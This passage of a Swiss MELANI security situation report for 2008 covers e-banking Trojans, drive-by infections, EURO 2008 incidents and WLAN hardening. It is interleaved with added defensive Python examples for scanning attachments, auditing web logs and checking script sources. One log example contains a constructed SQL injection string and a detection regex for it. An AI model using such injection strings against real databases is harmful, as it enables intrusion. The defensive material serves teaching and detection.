do not open any attached documents or programs, and do not click on any links contained in
the message. If an attachment is opened or a link is clicked on, MELANI recommends
consulting a computer specialist to reinstall the machine. Additionally, MELANI recommends
changing all passwords (e-mail account, auction sites, login data, etc.).
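An added example, not part of the report, of the check a mail gateway or a recipient's own tooling can apply to attachments of the kind described above: a constructed e-mail carries a zip archive containing an executable hidden by a space-padded double extension and another hidden behind a video extension, and each archive member is judged by its extension and by the first bytes of its content (the "MZ" header every Windows executable starts with) rather than by the name the sender chose. The addresses, subject line and file names are constructed; the standard library reads only zip, so rar archives would need an additional library.

```python
import io
import os
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions Windows executes directly when the user double-clicks.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
PE_MAGIC = b"MZ"  # first two bytes of every Windows executable


def build_sample_zip():
    """Constructed stand-in for a malicious attachment; the 'executables' are inert bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # double extension padded with spaces so that ".exe" scrolls out of view
        zf.writestr("Video.avi                          .exe", PE_MAGIC + b"\x00" * 62)
        # executable header hidden behind a harmless-looking extension
        zf.writestr("unfall.avi", PE_MAGIC + b"\x90" * 30)
        zf.writestr("readme.txt", b"Sehen Sie das Video.")
    return buf.getvalue()


def build_sample_email():
    """Constructed e-mail modelled on the waves described above (not a real sample)."""
    msg = EmailMessage()
    msg["From"] = "news@example.invalid"
    msg["To"] = "kunde@example.invalid"
    msg["Subject"] = "Neuigkeiten zur radioaktiven Verseuchung in der Schweiz"
    msg.set_content("Das Video zum Unfall finden Sie im Anhang.")
    msg.add_attachment(build_sample_zip(), maintype="application",
                       subtype="zip", filename="video.zip")
    return msg.as_bytes()


def inspect_zip(data):
    """Return (member name, reasons) for every archive member that looks executable."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = os.path.splitext(name.rstrip())[1].lower()
            reasons = []
            if ext in EXECUTABLE_EXTENSIONS:
                reasons.append("executable extension")
                if name.count(".") >= 2:
                    reasons.append("double extension")
            with zf.open(info) as member:
                head = member.read(len(PE_MAGIC))
            if head == PE_MAGIC and ext not in EXECUTABLE_EXTENSIONS:
                reasons.append("PE header behind non-executable extension")
            if reasons:
                findings.append((name, reasons))
    return findings


def scan_email(raw_bytes):
    """Open every attachment of a raw RFC 5322 message and collect the findings."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    findings = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or "<unnamed>"
        payload = part.get_payload(decode=True) or b""
        ext = os.path.splitext(filename)[1].lower()
        if ext == ".zip":
            findings.extend(inspect_zip(payload))
        elif ext in EXECUTABLE_EXTENSIONS or payload[:2] == PE_MAGIC:
            findings.append((filename, ["executable attachment"]))
    return findings


def should_quarantine(raw_bytes):
    return bool(scan_email(raw_bytes))


if __name__ == "__main__":
    for name, reasons in scan_email(build_sample_email()):
        print(repr(name), "->", ", ".join(reasons))
```

Checking the content bytes is what makes the second member visible: a filter that looks only at extensions would pass "unfall.avi" straight through, which is exactly the concealment the compressed attachments rely on.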



¹¹ http://www.melani.admin.ch/dienstleistungen/newsletter/00128/index.html?lang=en (as of: 11.08.2008).


In the first half of 2008, drive-by infections (see Chapters 2.2 and 4.3) were also used to
distribute Trojan horses targeting Swiss e-banking clients. However, these used a different
malicious software variant than that distributed by e-mail.

In general, the following rule applies: When unexplainable interruptions in the e-banking
session occur, the affected clients should immediately contact the e-banking hotline of their
bank.




Possible Attack Against forza-eveline.ch

On 9 April 2008, it became public that the site www.forza-eveline.net could no longer be
accessed. The website collected signatures sympathetic to Federal Councillor Eveline
Widmer-Schlumpf. A DDoS attack against the website was suspected. An analysis by
MELANI showed, however, that the time distribution of queries did not exhibit any unusual
peaks, but rather only the typical temporal surfing behaviour of Swiss users. There was also
no unusually high number of queries from abroad. The statistically well-distributed IP address
range, consisting almost exclusively of Swiss addresses, indicates that this was most probably
not a DDoS attack. While the data volume was large, it should have been manageable by
any medium-size provider. However, it should be noted that DDoS attacks may also occur
against lower layers (e.g. SYN flooding), which at most appear in the log of a firewall or
router. The analysis of the POST entries is also interesting. These represent the entries
made in the guest book and are forwarded to a MySQL database. At a certain time,
suspicious entries appeared that otherwise did not exist in the log file. Shortly afterwards, the
database crashed.

MELANI believes that a DDoS attack is unlikely in this case; at most 5 hits per second were
recorded. It is more probable that ultimately, the system was unable to handle the many
legitimate queries. However, MELANI did find indications of a possible compromise of the
underlying MySQL database in which the guest book entries were stored.
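As an added example (the log lines are constructed, not MELANI's data from this case), the following Python code performs the two checks the analysis above describes on a web server access log: the peak number of requests per second, which separates a flood from ordinary traffic, and the POST requests to the guest book whose decoded query string contains SQL injection indicators, together with the count of server errors from that point on. The guest book path, the TEST-NET addresses and the request lines are this example's own assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined"-style access log, constructed for this example (TEST-NET addresses).
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [09/Apr/2008:10:15:01 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [09/Apr/2008:10:15:01 +0200] "GET /guestbook.php HTTP/1.1" 200 8042 "-" "Mozilla/5.0"
192.0.2.12 - - [09/Apr/2008:10:15:01 +0200] "GET /style.css HTTP/1.1" 200 913 "-" "Mozilla/5.0"
192.0.2.11 - - [09/Apr/2008:10:15:02 +0200] "POST /guestbook.php?name=Hans&text=Gruss+aus+Bern HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.13 - - [09/Apr/2008:10:15:05 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [09/Apr/2008:10:15:06 +0200] "POST /guestbook.php?name=x%27+OR+1%3D1--&text=test HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.13 - - [09/Apr/2008:10:15:06 +0200] "GET /guestbook.php HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of SQL injection attempts in a query string; one indicator is enough to flag.
SQLI_MARKERS = re.compile(r"('|--|;|\bunion\b|\bselect\b|\bdrop\b|\bor\b\s+1\s*=\s*1)", re.I)


def parse_access_log(text):
    """Turn the log into a list of dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def peak_requests_per_second(entries):
    """Highest number of requests sharing one timestamp (second resolution)."""
    if not entries:
        return 0
    return max(Counter(e["ts"] for e in entries).values())


def suspicious_posts(entries):
    """POST requests whose decoded query string contains SQL injection indicators."""
    hits = []
    for idx, e in enumerate(entries):
        if e["method"] != "POST":
            continue
        decoded = unquote_plus(e["target"])
        if SQLI_MARKERS.search(decoded):
            hits.append({"index": idx, "ts": e["ts"], "ip": e["ip"],
                         "target": decoded, "status": e["status"]})
    return hits


def analyse(text):
    entries = parse_access_log(text)
    posts = suspicious_posts(entries)
    # Errors from the first suspicious POST onward: the pattern "suspicious entries,
    # then the database crashed" shows up here as a run of 5xx responses.
    errors_after = 0
    if posts:
        errors_after = sum(1 for e in entries[posts[0]["index"]:]
                           if e["status"].startswith("5"))
    return {
        "requests": len(entries),
        "peak_per_second": peak_requests_per_second(entries),
        "suspicious_posts": posts,
        "server_errors_from_first_suspicious": errors_after,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_ACCESS_LOG).items():
        print(key, value)
```

A peak of a few requests per second, as here, is what normal browsing looks like; the indicator that deserves follow-up is the injected POST immediately preceding the server errors, which is the same sequence the analysis above observed in the guest book log.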




4.3 Crime

Websites Misused for Drive-By Infections

The distribution of drive-by infections has surged in recent months. Sites are systematically
hacked, on which malicious code is then placed. To achieve this, vulnerabilities especially on
interactive websites are exploited, or the access data of website administrators is spied out.

At the end of June 2008, massive numbers of websites at a single Swiss hosting provider
were compromised, on which a link to malicious JavaScript was placed. The insidious aspect
of this attack was that normal access to the site would not trigger execution of the malicious
code, but only when the site was accessed via a search engine (see Chapter 2.2). As a
further concealment measure, the malicious JavaScript had the same name as a JavaScript
used by Google for website analysis (Google-Analytics). Even the domain on which the script
was saved looked convincingly like a Google domain and differed only at the top level. An
estimated 1,000 websites were hacked in this case. It is not known how many people were
infected.

Other Swiss websites were also victims of drive-by infections. The websites of the former
Member of the Council of States from Valais, Simon Epiney (simonepiney.ch), and of the
Green Party of Switzerland (gruene.ch) were compromised and infected with a drive-by
infection. Once the infection became known, the sites were temporarily blocked by the
providers. How many computer users were actually infected is again unclear. According to
information supplied by the provider, a vulnerability in a PHP application was the reason in at
least one case why the sites could be manipulated.

Website operators are advised to regularly check their applications for security risks and to
modify them where necessary.¹² MELANI also recommends that web and server
administrators install updates and patches as quickly as possible, both for the software used
on their website and for the webserver itself.

Additionally, FTP access data to websites are being collected on a large scale. This may
happen by way of malicious software (keylogger) installed on the computer on which the
website is administered.
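An added example, not taken from the report or from any provider's tooling, of how a website operator can audit their own pages for the kind of injection described above (a script whose host imitates a well-known vendor and differs only in the top-level domain): extract every script source from the HTML and classify its host as trusted, lookalike, local, or unknown. The HTML, the ".example" lookalike host and the trusted-host list are constructed for this example; urchin.js was the name of the Google Analytics include at the time.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts from which the listed vendor scripts are legitimately served. This is the
# example's own assumption; a real audit lists the hosts your pages actually use.
TRUSTED_SCRIPT_HOSTS = {
    "google-analytics": {"www.google-analytics.com", "ssl.google-analytics.com"},
}

# Constructed page: one legitimate analytics include, one lookalike that differs only
# in the top-level domain, and one script served from the site itself.
SAMPLE_HTML = """<html><head>
<script src="https://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script src="http://www.google-analytics.example/urchin.js" type="text/javascript"></script>
<script src="/js/menu.js"></script>
</head><body><p>Willkommen</p></body></html>
"""


class ScriptSrcExtractor(HTMLParser):
    """Collects the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def extract_script_srcs(html):
    parser = ScriptSrcExtractor()
    parser.feed(html)
    return parser.srcs


def classify_script_src(src):
    """'local', 'trusted', 'lookalike' (vendor name under another domain) or 'unknown'."""
    host = (urlsplit(src).hostname or "").lower()
    if not host:
        return "local"
    labels = host.split(".")
    for vendor, trusted in TRUSTED_SCRIPT_HOSTS.items():
        if host in trusted:
            return "trusted"
        # The vendor's name appears as a label of the host, but the host is not one of
        # the vendor's real ones: e.g. google-analytics.<other TLD>.
        if vendor in labels:
            return "lookalike"
    return "unknown"


def audit_page(html):
    """Map every script source on the page to its classification."""
    return {src: classify_script_src(src) for src in extract_script_srcs(html)}


def lookalike_scripts(html):
    return [src for src, verdict in audit_page(html).items() if verdict == "lookalike"]


if __name__ == "__main__":
    for src, verdict in audit_page(SAMPLE_HTML).items():
        print(f"{verdict:10} {src}")
```

Because the injected code in the case above only ran when the visitor arrived via a search engine, a self-check should fetch each page twice, once without and once with a Referer header naming a search engine, and audit both responses; anything classified "unknown" should be compared against the list of script tags the operator deployed deliberately.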




4.4 Miscellaneous

EURO 2008 Only a Limited Target for Cybercriminals

It was expected that the EURO 2008 would be used by cybercriminals as a launch pad for
their criminal machinations. These activities were strictly limited, however. Some of the
incidents were the following:

euroticketshop.com
At the end of March 2008, hackers succeeded in manipulating the order page of the popular
ticket site "euroticketshop.com" so that visitors were infected via drive-by infection by the
Trojan "TR/Dldr.Small.hzj". As needed, the attacker could use the Trojan to download further
malicious software with a wide range of functions. It is unknown how many computers were
infected on this site.

sleep-in.ch
The Swiss website "sleep-in.ch", on which private hosts offered accommodation for the
EURO 2008, reported that it was attacked by hackers on 21 April 2008. Offers by more than
2,800 hosts were targeted and deleted. The lost data could largely be restored through
backups.

Bogus UEFA lottery
During the EURO 2008, numerous e-mails were sent with the notice that the recipient had
won a million euros in the UEFA lottery. This UEFA lottery was, of course, bogus. The e-mail
was a typical attempt to swindle recipients out of money through false promises. When the
recipient responds to such an e-mail, some excuse is given to demand an advance payment
(winnings tax). Of course, the promised money is then never transferred.

Defacement of the website of the Croatian foreign ministry
Turkish hackers are suspected of manipulating the website of the Croatian foreign ministry
during the Croatia – Turkey match. Instead of the original text, a Turkish flag was displayed.
Once the manipulation was noticed, the server was shut down.

¹² For additional information, see: http://www.heise.de/security/Grandsicherung-fuer-PHP-Software--/artikel/96564 (as of: 11.08.2008).

Power outage at the International Broadcast Centre of UEFA
A power outage at the International Broadcast Centre of UEFA in Vienna resulted in an
interruption of the TV broadcast of the semi-final match between Germany and Turkey for
about eight minutes. The power outage was triggered by a major thunderstorm over Vienna.
A software error prevented a seamless switch to emergency power generators, causing
several computers to crash. The interruption affected all countries' TV stations except Swiss
Television and Al Jazeera.

From the perspective of information assurance, the EURO 2008 was very quiet.
Cybercriminals had been expected to use the EURO as a launch pad for their criminal
machinations. Some attacks of this sort were reported, but the volume of reporting to
MELANI was comparable with other months overall. It should be emphasized in particular
that no DDoS attacks against the websites of critical information infrastructures or EURO
2008 websites were registered.




Temporary Blocking of wikileaks.org

Wikileaks is an anonymous project launched at the end of 2006 for "untraceable mass
document leaking and analysis". It primarily targets persons such as regime critics who
cannot publish their knowledge in the censored press of their home countries. Wikileaks also
wants to support those who "wish to reveal unethical behaviour in their governments and
corporations". Wikileaks does not guarantee the authenticity of the documents and leaves it
to readers to do their own further research.

On 15 February 2008, the wikileaks.org domain was blocked pursuant to a temporary
injunction issued to the registrar by a Californian judge. This injunction was triggered by the
publication of specific documents: A former employee of the Julius Bär bank branch on the
Cayman Islands had accused the bank of facilitating its clients' money laundering and tax
evasion. Documents supporting this claim were published on the wikileaks.org website. The
documents contained correspondence, internal memos, and calculations of the bank.
According to Julius Bär, the information consisted of a mix of documents, some of which had
been falsified and some of which were generic shams. Julius Bär filed suit against the
publication and achieved an "interim" blocking of the domains by the US judge. This caused
serious protest among American civil rights organizations and the media. They claimed that
the blocking of the domain violated freedom of speech. Two weeks later, the judge changed
his opinion "due to constitutional concerns and other legal considerations". The injunction
was lifted, and the website has again been reachable under its usual URL since 29 February
2008. The bank subsequently retracted its lawsuit against wikileaks.org.

When companies or government authorities try to act against the publication of specific
documents on the Internet, their efforts are typically unsuccessful. In this case, the
correspondence between the bank and its lawyers appeared soon afterwards on Wikileaks,
which noted that the call for censorship indicated that the published materials were authentic.
Wikileaks garnered considerable international publicity due to the media coverage of the
blocking of its domain. This further enhanced the credibility of the demonstrably false
documents.

According to its own information, Wikileaks is operated by a worldwide network of volunteers.
It claims that this global network ensures flexibility during emergencies. Due to the available
alternative domains (wikileaks.be, wikileaks.cx, etc.), the contents are easily accessible even
after the main domain has been blocked. Even if all known alternative domains were to be
blocked, the contents – which are mirrored on many different servers in various countries –
would continue to be accessible. Even if the current online server of the website were to be
interfered with physically, it would only be a short time before another server would assume
its tasks. In short, once a document has been published on Wikileaks, it can hardly ever be
removed.




5 Current International ICT Situation

5.1 Breakdowns

Damaged Undersea Internet Cables Interfere with Internet

At the beginning of 2008, several undersea Internet cables in the Mediterranean and the
Persian Gulf were damaged in the course of just a few days. This resulted in at times
substantial interference with the Internet between Europe, the Middle East, and the Indian
subcontinent. Such incidents call for answers concerning the vulnerability and redundancy of
the Internet.

First, two undersea cables in the Mediterranean broke, connecting Europe via Egypt and the
Middle East to India. Thus, a location was affected that represented the only route for the
Internet traffic of entire regions of the world. This damage was responsible for a shortage of
about 70% of the network capacity in Egypt and interference with about 50% of the data
traffic from India to the West. A few days later, two additional undersea cables in the Persian
Gulf failed. The effects were mitigated by the availability of alternative routes in the Arab
world.

This accumulation of breakdowns led to numerous speculations concerning their origin.¹³ It is
now known that at least two of the cables were damaged by ships' anchors. Generally
speaking, damage to undersea Internet cables is not rare, however. In 2007 alone, more
than 50 repairs were carried out on cables in the Atlantic.¹⁴

These incidents bring to mind that the Internet only works thanks to physical connections.
The Internet consists of local networks connected via so-called backbones, generally fibre-
optic cables. The cables constituting the networks are not equally dense in all locations.
There are therefore locations, such as the Mediterranean, where local connection failures
cannot simply be compensated by nearby cables. If such a weak spot is affected by a
substantial failure, this may lead to temporary interference with the Internet. In general,




¹³ See: http://www.economist.com/world/international/displaystory.cfm?story_id=10653963 (as of: 29.07.2008).
¹⁴ For additional information, see: http://www.heise.de/tr/Warum-das-Netz-zusammenbrach--/artikel/103167 and http://www.heise.de/newsticker/Satellitenbilder-klaeren-Ursachen-fuer-Seekabelbeschaedigungen--/meldung/106502 (as of: 29.07.2008).

however, the redundant structure of the Internet helps to counter failures, and the Internet
still has considerable excess capacity, helping to achieve a low level of vulnerability.




Imprudent Approach to Sensitive Data

On 30 April 2008, the Italian authorities published tax statements from the year 2005 on the
Internet. The intention of the authorities was to ensure greater transparency. However, the
tax database then broke down due to the surge of curious Internet users. The Italian data
protection authority condemned the publication of private information and demanded that the
site be blocked immediately. Much of the data was already in circulation, however. The daily
newspaper "La Stampa", for instance, had already downloaded and published numerous tax
statements.

In May 2008, a hacker published the datasets of 6 million Chileans on the Internet,
containing their names, addresses, telephone numbers, social backgrounds, and educational
experience. The hacker is alleged to have broken into Chilean government servers and
copied the data stored there. Servers of the ministry of education, the election commission,
the army, and the public telephone company were affected. According to reports, the data
were available on popular websites for several hours, where they could be freely
downloaded.

These two cases likewise illustrate the difficulty of keeping data under control that have been
published on the Internet. This must be observed both for private and for government data.
As the example of Italy and also the example of Schengen (see Chapter 4.1) show, such
data incidents are not only due to technical causes. In addition to technical security, the
approach of employees to confidential documents must also be regulated (see also Chapter
2.1).




5.2 Attacks

Politically Motivated Hacking: Lithuania and Radio Free Europe Targeted

At the end of June 2008, about 300 Lithuanian websites were defaced, some with the
emblem of the former Soviet Union (hammer and sickle). The attack took place just days
after the adoption of a Lithuanian law prohibiting, among other things, the display of such
Soviet emblems. The attack targeted the websites of the government, political parties, and
private companies. Most of these sites were hosted on a single physical server, where a
vulnerability was exploited.

A DDoS attack that was also probably politically motivated was directed in April 2008 against
the US-supported Radio Free Europe. The attacks mainly targeted the Radio Free Europe
service in Belarus and began on the anniversary of the Chernobyl nuclear disaster. On this
day, the radio transmitted a live broadcast of a protest action in Minsk commemorating the
suffering of the victims and speaking out against a government decree to construct a new
nuclear power plant. Apparently, the radio station was flooded with up to 50,000 commands
per second at the climax of the attack.




When such attacks occur, it is extraordinarily difficult to identify the perpetrator. For
defacements, proxy bots or other IP concealment techniques are used. For DDoS attacks,
botnets are also used to disguise the identity of the perpetrators. However, it can be
assumed that both of these attacks were politically motivated. For a general assessment of
politically motivated hacking, see Chapter 2.3.




ICANN and IANA Domains Hacked

At the end of June 2008, a Turkish hacker group attacked and redirected domains of the
Internet Corporation for Assigned Names and Numbers (ICANN) and the Internet Assigned
Numbers Authority (IANA). It is nothing new that interesting and well-known domains can be
attacked. What was special about this case is that ICANN and IANA are the institutions with
control over domains and IP addresses. Apparently, several domains were affected, which
were redirected to a website of the hackers. The following comment then appeared: “You
think that you control the domains but you don’t! We control the domains including ICANN!”.
No precise information is available on the method employed by the hackers. The case
appears to demonstrate, however, that anyone can be affected by such an attack.

Such cases show how important it is for Internet hosting providers to always keep their
systems up to date. A challenge is that the websites of several clients run on the same
hosting server. When the website of a client is attacked via a weakness in one of the client’s
web applications, for example, there is a possibility that the websites of other clients will also
be affected. Conversely, an attack on the webserver itself may affect all websites stored on
it.




6 Prevention

6.1 Focus: Wireless Networks
Private Wireless Networks

Wireless networks (WLANs) have become widespread also among private individuals. Many
Internet offers already include a WLAN router. Additionally, the trend is moving more and
more clearly away from desktop computers toward portable devices with built-in wireless
network cards. The iPhone will also boost the dynamics of wireless technology.

On the other hand, the security awareness of users has risen steadily in recent years. In a
report of the Swiss monthly magazine "IT-Security",¹⁵ 474 wireless networks were examined.
Of these, 11% were (public) hotspots, 22% unencrypted, and 67% encrypted. These
non-representative numbers are the result of a field test in the city of Zurich. They correspond to



¹⁵ IT-Security, issue 2/2006, page 40.
more recent tests in Germany that found the security settings of every fifth or sixth wireless
network to be insufficient.¹⁶ Other tests, however, give users significantly worse marks.¹⁷ In
any event, it is likely indisputable that far too many wireless networks continue to be
insufficiently protected or not protected at all, especially given the steady increase in reported
abuse. For instance, potential attacks against the internal network and the recording of network
traffic constitute a threat (see Chapter 3.1).

In this section, however, the use of open wireless networks to conceal the identity of IT
criminals will be discussed. The Swiss Coordination Unit for Cybercrime Control (CYCO)
knows of various cases in which open WLANs were used to commit a crime. These included
extortion, sexual assault, and downloading of child pornography. From a security technology
standpoint, such networks are therefore associated with a considerable risk potential.

The legal situation with respect to open wireless networks is not yet fully clear. In Germany,
court decisions in recent years have attracted attention. For instance, the District Court of
Hamburg cited the principles of nuisance liability in its decision of July 2006.¹⁸ Generally
speaking, a person is liable who, in any way, deliberately and with an appropriate causal link
participates in bringing about an unlawful nuisance. Service providers merely offering access
to third-party content who contribute indirectly to a violation of the law in the form of further
dissemination of information can also be deemed liable for nuisance. Anyone operating a
wireless Internet connection must ensure the security of his or her router, otherwise he or
she violates reasonable duties of diligence. A decision by the Court of Appeal of Düsseldorf
found that everyone is responsible for the security of their own WLAN and is accountable for
potential consequences of misuse if the security is insufficient. The court furthermore
demanded that computers used by several persons must have a separate account with a
separate password for each user. In the most recent judgement on 1 July 2008, however, the
Court of Appeal of Frankfurt am Main rejected this view. Unlimited liability of the WLAN user
would clearly go too far. While everyone is responsible for behaving in a proper and lawful
manner, this duty cannot be excessively extended to liability for unknown third parties via
nuisance liability.¹⁹

According to CYCO's assessment, it is not conceivable in Switzerland at this time that a
WLAN operator could be made criminally responsible. Liability pursuant to article 41 of the
Code of Obligations²⁰ ("Anyone unlawfully causing injury to another party, whether with intent
or through negligence, shall be responsible for compensation to that party") is unlikely in
Switzerland at this time. This does not mean, however, that the problem of open WLANs
could not cause problems in day-to-day legal practice. Moreover, the abuse of a wireless
network could in any event cause inconvenience to the operator. If a crime is committed via a
wireless network, the corresponding IP address necessarily is reported to the investigating
law enforcement authority. Since the IP address is generally a reliable starting point, a house
search is usually conducted. Although the falsely accused person likely has nothing to fear,
this may trigger unpleasant rumours among neighbours and cause a considerable shock.




¹⁶ http://www.lifepr.de/pressemeldungen/pc-feuerwehr-franchise-interactive-media-gmbh/boxid-20794.html (as of: 11.08.2008).
¹⁷ http://www.pressetext.ch/pte.mc?pte=070904001 (as of: 11.08.2008).
¹⁸ See judgement of the District Court of Hamburg: http://www.lampmannbehn.de/wlan.html (as of: 11.08.2008).
¹⁹ See judgement of the Court of Appeal of Frankfurt: http://medien-internet-and-recht.de/volltext.php?mir_dok_id=1671 (as of: 11.08.2008).
²⁰ http://www.admin.ch/ch/d/sr/220/a41.html (as of: 11.08.2008).



Operators of private wireless networks should observe the following points:

Protection of the administration page
Most WLAN access points have a user interface for administration that is accessible by
browser (http://IP_ADDRESS_OF_ACCESS_POINT). The settings described below can also
be configured with this interface. Access to this administration page is protected by a
default password that should be changed immediately.

Wireless connection via access point
Direct wireless connections between two computers (ad hoc mode) are always relatively
insecure. It is better to use a central access point via which all devices are connected. The
access point should be set up in such a way that only a wireless connection with the Internet
is permitted, but not a wireless connection with the internal network.

Turn off remote connection
Some base stations allow their settings to be changed externally via the Internet. This
function is intended so that employees of the manufacturer can reconfigure the base station
to remedy errors. If you do not use this remote connection, definitely turn it off.

Change the network name (SSID)
Change the default network name (SSID).

Suppress network name broadcasts
Prevent the WLAN access point from regularly broadcasting its network name (SSID). For
this, the “Broadcast SSID” option must be set to “No”.

Limit access to your devices
Limit access to your access point so that only your devices can communicate with it. This
can be done by defining the devices’ MAC addresses.

Switch on the encryption
In the WLAN hardware, activate WPA or WPA2 encryption and select a strong passphrase
that is difficult to guess. For WPA2-PSK, the passphrase should be at least 20 characters.
Regularly change the keys used for encryption.
If your WLAN hardware does not yet support WPA or WPA2, activate WEP encryption.
The WEP key (key length selected by you, if possible 128 bit) must be known to both the
access point and the end device.

RADIUS server for companies
The best security for company networks is probably provided by a RADIUS server with
WPA2. One of the tasks of RADIUS is to control access to the wireless network. The main
functions of RADIUS are authentication, authorization, and accounting (AAA).

Use of password if there are several users
If the WLAN is made available to several users, access should be restricted only to these
users. The best way to do this is by agreeing on a password in advance for encryption.

Turn off access point when not in use
Turn off the access point when you are not using it, such as overnight. This gives hackers
less opportunity for attacks.
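The checklist above, expressed as a small configuration audit. This is an added example, not a MELANI tool or the firmware of any access point; the configuration fields, the lists of factory-default passwords and SSIDs, and the two sample configurations are assumptions constructed for the illustration.

```python
"""Audit an access point's settings against the checklist above.

Added illustration, not a MELANI tool. The configuration fields, the lists
of factory defaults and the two sample configurations are constructed."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed samples of factory defaults; real devices differ.
DEFAULT_ADMIN_PASSWORDS = {"", "admin", "password", "1234"}
DEFAULT_SSIDS = {"default", "wlan", "wireless", "linksys", "netgear"}
MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.IGNORECASE)
MIN_PSK_LEN = 20  # the text: at least 20 characters for WPA2-PSK (applied to WPA too)


@dataclass(frozen=True)
class AccessPointConfig:
    admin_password: str        # password of the browser administration page
    remote_admin: bool         # settings changeable from the Internet
    ssid: str                  # network name
    broadcast_ssid: bool       # "Broadcast SSID" option
    mac_allowlist: tuple       # MAC addresses allowed to associate; empty = no filter
    encryption: str            # "none", "wep", "wpa" or "wpa2"
    passphrase: str            # WPA/WPA2 pre-shared key (or WEP key)
    wireless_to_lan: bool      # wireless clients may reach the internal wired network


def audit(cfg: AccessPointConfig) -> List[Tuple[str, str]]:
    """Return (code, recommendation) pairs for each checklist item not met."""
    findings = []
    if cfg.admin_password in DEFAULT_ADMIN_PASSWORDS or len(cfg.admin_password) < 8:
        findings.append(("ADMIN_PASSWORD",
                         "Change the standard password of the administration page."))
    if cfg.remote_admin:
        findings.append(("REMOTE_ADMIN", "Turn off reconfiguration via the Internet."))
    if cfg.ssid.lower() in DEFAULT_SSIDS:
        findings.append(("DEFAULT_SSID", "Change the default network name (SSID)."))
    if cfg.broadcast_ssid:
        findings.append(("SSID_BROADCAST", "Set 'Broadcast SSID' to 'No'."))
    if not cfg.mac_allowlist:
        findings.append(("MAC_FILTER", "Allow only the MAC addresses of your own devices."))
    elif not all(MAC_RE.match(m) for m in cfg.mac_allowlist):
        findings.append(("MAC_FORMAT", "The MAC allowlist contains a malformed address."))
    enc = cfg.encryption.lower()
    if enc == "none":
        findings.append(("NO_ENCRYPTION", "Activate WPA2 (or WPA) encryption."))
    elif enc == "wep":
        findings.append(("WEP", "WEP is considered insecure; move to WPA2 as soon as the hardware allows."))
    elif enc in ("wpa", "wpa2") and len(cfg.passphrase) < MIN_PSK_LEN:
        findings.append(("SHORT_PSK", f"Use a pre-shared key of at least {MIN_PSK_LEN} characters."))
    if cfg.wireless_to_lan:
        findings.append(("LAN_REACHABLE",
                         "Permit wireless clients to reach the Internet only, not the internal network."))
    return findings


# Constructed sample: a box still on factory settings ...
FACTORY = AccessPointConfig("admin", True, "default", True, (), "none", "", True)
# ... and the same box after working through the checklist.
HARDENED = AccessPointConfig("n0t-the-f4ctory-pw", False, "home-ap-42", False,
                             ("00:1a:2b:3c:4d:5e",), "wpa2",
                             "correct horse battery staple 2008", False)

if __name__ == "__main__":
    for name, cfg in (("factory", FACTORY), ("hardened", HARDENED)):
        print(f"{name}: {len(audit(cfg))} finding(s)")
        for code, advice in audit(cfg):
            print(f"  [{code}] {advice}")
```

Running the script prints seven findings for the factory configuration and none for the hardened one. The MAC filter and the hidden SSID are kept as checklist items; they limit casual access but are no substitute for WPA2 encryption with a long pre-shared key.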

Public Wireless Networks

The traceability of users is also a current topic in the field of public commercial and non-
commercial providers of wireless networks. Many providers are unable, or only partially able, to
trace an IP address and attribute it to a user. In Italy, in contrast, this has been mandated by
law since July 2005, and all operators of public wireless networks must register their users. 21
This rule applies to Internet café operators and hotels, for instance. In Switzerland, the
situation is different. Pursuant to the Federal Law on Post and Telecommunications
Surveillance (Surveillance Act), an Internet provider is defined as a telecommunications
provider, or part of a telecommunications provider, offering the public transmission of
information by telecommunications on the basis of IP technology using public IP addresses.
Since wireless networks as a rule use private rather than public IP addresses,
Swiss companies or organizations offering wireless networks are accordingly not subject to
the Surveillance Act or the associated ordinance. That simple options for contributing to
security are nonetheless available is shown by the WLAN project of Energy
Water Lucerne: its free WLAN offering can only be accessed by persons who have
registered in advance by text message.

A further problem is seen in the WLAN prepaid cards of large telecom providers allowing
anonymous access to WLAN hotspots. This problem brings to mind the registration
requirement for prepaid mobile telephones, which was long advocated and finally introduced
on 1 July 2004. A parliamentary motion on a registration requirement for wireless prepaid
cards, analogous to prepaid mobile phone cards, is currently pending.

It is becoming the norm to be available always and everywhere. WLAN plays an increasingly
important role for wireless connections. Especially in light of the introduction of the iPhone
and other cell phones with WLAN access, this type of communication will gain in popularity.
Moreover, it is now possible to make an Internet connection – whether by cable or wireless –
available to several persons at a low cost. Unlike cable, the range of wireless connections is
substantial, however. Especially with respect to traceability, great differences exist between
“private” and licensed providers. It should, however, be in the interest of every wireless
network user to keep one’s own network clean; adequate protection prevents the network
from being misused by third parties, and the correct attribution of an IP address in the event
of a criminal offence plays an important role in the successful suppression of Internet crime.




21 See: http://www.csmonitor.com/2005/1004/p07s01-woeu.html (as of: 11.08.2008).

7 Activities / Information

7.1 State

Germany: Debate on Online Searches Continues

